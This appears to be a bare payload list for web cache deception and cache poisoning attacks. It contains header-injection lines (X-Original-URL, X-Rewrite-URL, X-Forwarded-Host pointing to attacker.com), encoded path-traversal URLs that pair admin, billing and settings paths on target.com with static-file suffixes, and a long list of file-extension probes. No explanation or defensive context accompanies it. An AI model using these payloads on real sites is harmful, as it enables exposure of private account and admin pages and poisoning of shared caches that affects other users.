X-Original-URL: /admin/
X-Rewrite-URL: /profile/
X-Forwarded-Host: attacker.com
X-Forwarded-Path: /static.css


https://target.com/settings/%2e%2e/images/logo.png  
https://target.com/admin/%2e%2e/scripts/app.js  
https://target.com/profile/%2e%2e/assets/styles.css  
https://target.com/billing/%2e%2e/fonts/main.woff  
https://target.com/api/v2/orders/%2e%2e/public/data.json  
https://target.com/user/%2e%2e/favicon.ico

/%2e%2e/images/logo.png  
/%2e%2e/scripts/app.js  
/%2e%2e/assets/styles.css  
/%2e%2e/fonts/main.woff  
/%2e%2e/public/data.json  
/%2e%2e/favicon.ico



.js?test=123
.css?test=123
.jpeg?test=123
.jpg?test=123
.png?test=123
.gif?test=123
.woff?test=123
.woff2?test=123
.ttf?test=123
.otf?test=123
.svg?test=123
.html?test=123
.xml?test=123
.json?test=123
.mp4?test=123
.webm?test=123
.ico?test=123
.txt?test=123
.pdf?test=123
.doc?test=123
.xls?test=123
.ppt?test=123
.mp3?test=123
.ogg?test=123
.wav?test=123
.csv?test=123
.swf?test=123
.zip?test=123
.tar?test=123
.gz?test=123
.bz2?test=123
.7z?test=123
.webp?test=123
.bmp?test=123
.mpg?test=123
.avi?test=123
.mkv?test=123
.flv?test=123
.wmv?test=123
.ogg?test=123
.weba?test=123
.srt?test=123
.vtt?test=123
.rss?test=123
.atom?test=123
.webmanifest?test=123
.appcache?test=123
.ico?test=123
.jsonld?test=123
.webmanifest?test=123
.manifest?test=123
.yaml?test=123
.log?test=123
.jar?test=123
.webloc?test=123
.plist?test=123
.mpg2?test=123
.mk3d?test=123
.webm?test=123
.shtml?test=123
.xhtml?test=123
.phtml?test=123
.jsp?test=123
.aspx?test=123
.slim?test=123
.md?test=123
.txt?test=123
.woff?test=123
.woff2?test=123
.json?test=123
.map?test=123
.yml?test=123
.yaml?test=123
